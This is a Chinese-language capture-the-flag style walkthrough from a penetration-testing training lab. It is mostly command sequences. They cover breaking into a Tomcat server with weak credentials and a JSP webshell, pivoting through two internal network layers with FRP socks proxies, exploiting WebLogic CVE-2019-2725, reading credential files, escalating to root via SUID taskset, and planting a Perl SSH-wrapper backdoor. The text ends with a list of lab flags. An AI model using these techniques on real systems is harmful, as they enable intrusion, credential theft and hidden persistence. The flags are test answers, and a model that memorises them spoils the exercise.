蚁景网安实验室-双层内网渗透虚拟仿真实战
字数 1664 2025-08-22 12:23:19
双层内网渗透虚拟仿真实战教学文档
实验环境概述
本实验提供了一个综合性的多层内网渗透测试虚拟仿真环境,通过以下攻击路径:
- 外网WEB服务器渗透
- 第一层内网渗透
- 第二层内网渗透
- 权限提升与持久化控制
在线环境:https://www.yijinglab.com/
第一阶段:外网WEB服务器渗透
1. 信息收集
目标IP确认:10.1.1.121
端口扫描:
- 发现8080端口运行Tomcat服务,版本8.0.43
目录扫描:
dirb http://10.1.1.121:8080
发现管理后台:
- http://10.1.1.121:8080/manager/html
- http://10.1.1.121:8080/host-manager/html
2. Tomcat漏洞利用
弱口令登录:
- 使用tomcat:tomcat成功登录管理后台
木马部署:
- 创建包含JSP木马的WAR包:
mkdir ant
cp ant.jsp ant/
cd ant
jar -cvf ant.war .
- 通过管理后台上传部署ant.war
WebShell访问:
- URL: http://10.1.1.121:8080/ant/ant.jsp
- 密码: ant
3. 信息收集
系统信息收集:
# 查看网络配置
ip a
# 查看用户信息
cat /etc/passwd
cat /etc/shadow
# 查找敏感文件
find / -name *pass* -type f
find / -name *admin* -type f
# 查找flag
grep -r "flag*"
第二阶段:第一层内网渗透
4. 内网扫描
上传工具:
- 上传ladon64到/tmp目录
内网扫描:
chmod +x ladon64
./ladon64 172.22.0.0/24 icmpscan
发现存活主机:
- 172.22.0.20
- 172.22.0.22(开放7001端口,运行WebLogic 10.3.6.0)
5. 建立Socks5代理
FRP配置:
frpc.ini(Tomcat服务器):
[common]
server_addr = 10.1.1.119
server_port = 7000
[socks5]
type = tcp
plugin = socks5
remote_port = 5000
frps.ini(攻击机):
[common]
bind_addr = 10.1.1.119
bind_port = 7000
启动服务:
- 攻击机:
./frps -c frps.ini - Tomcat服务器:
./frpc -c frpc.ini
代理测试:
修改/etc/proxychains.conf:
socks5 127.0.0.1 5000
6. Weblogic漏洞利用
漏洞扫描:
proxychains python3 weblogic-CVE-2019-2725.py 10.3.6 http://172.22.0.20:7001/ whoami
WebShell部署:
wget http://172.22.0.10:8080/ant/ant.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/ant.jsp
- URL: http://172.22.0.20:7001/bea_wls_internal/ant.jsp
- 密码: ant
7. 信息收集
系统信息收集:
whoami
ip a
ps -elf
find / -name *pass*
发现凭证:
- /root/pass.txt中的base64编码:
simadmin:dev@simadmin
二层内网扫描:
./ladon64 172.26.0.0/24 icmpscan
发现存活主机:172.26.0.30
第三阶段:二层内网渗透
8. 建立二层代理
FRP配置:
Weblogic服务器(frpc.ini):
[common]
server_addr = 172.22.0.10
server_port = 7000
[socks5_2]
type = tcp
plugin = socks5
remote_port = 6666
Tomcat服务器(frps.ini):
[common]
bind_addr = 172.22.0.10
bind_port = 7000
代理链配置:
修改/etc/proxychains.conf:
socks5 172.22.0.10 6666
9. 端口扫描
proxychains nmap -Pn -sT -T4 172.26.0.30
发现开放22端口(SSH)
10. SSH登录
proxychains ssh simadmin@172.26.0.30
使用凭证:simadmin:dev@simadmin
第四阶段:权限提升与持久化
11. 提权
查找SUID文件:
find / -perm -u=s -type f
利用taskset提权:
taskset 1 /bin/bash -p
whoami # 确认root权限
12. 权限持久化
SSH后门部署:
cd /usr/sbin/
mv sshd ../bin
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..LF/);' >>sshd
echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
后门使用:
echo "whoami" | socat STDIO TCP4:172.26.0.30:22,sourceport=19526
关键知识点总结
- 信息收集:端口扫描、目录扫描、系统信息收集
- 漏洞利用:Tomcat弱口令、WebLogic CVE-2019-2725
- 代理技术:多层Socks5代理建立(FRP)
- 横向移动:凭证重用、内网扫描
- 权限提升:SUID提权(taskset)
- 持久化:SSH Wrapper后门
实验Flag汇总
- flag{df3b03ac2298b01bba7a3bac74fd7c9f}
- flag{aa46468cee325f33f6e4a660d0b72011}
- flag{e2a82c99b19d8368257198ecfaaa510f}
- flag{ce395be7238ceb5bb8dd76fb7e220bec}
- flag{b3d3422ba4cdb3de076f521f52d70e84}
- flag{b7928c5332a5c8a9cdda4a7f18c87fca}
- flag{fcc9f2e35685a3b074c53d0e619c1d26}
注意事项
- 执行命令间隔需等待前一个连接关闭
- 代理配置需正确设置
- 文件上传需注意权限和路径
- 后门连接源端口必须为19526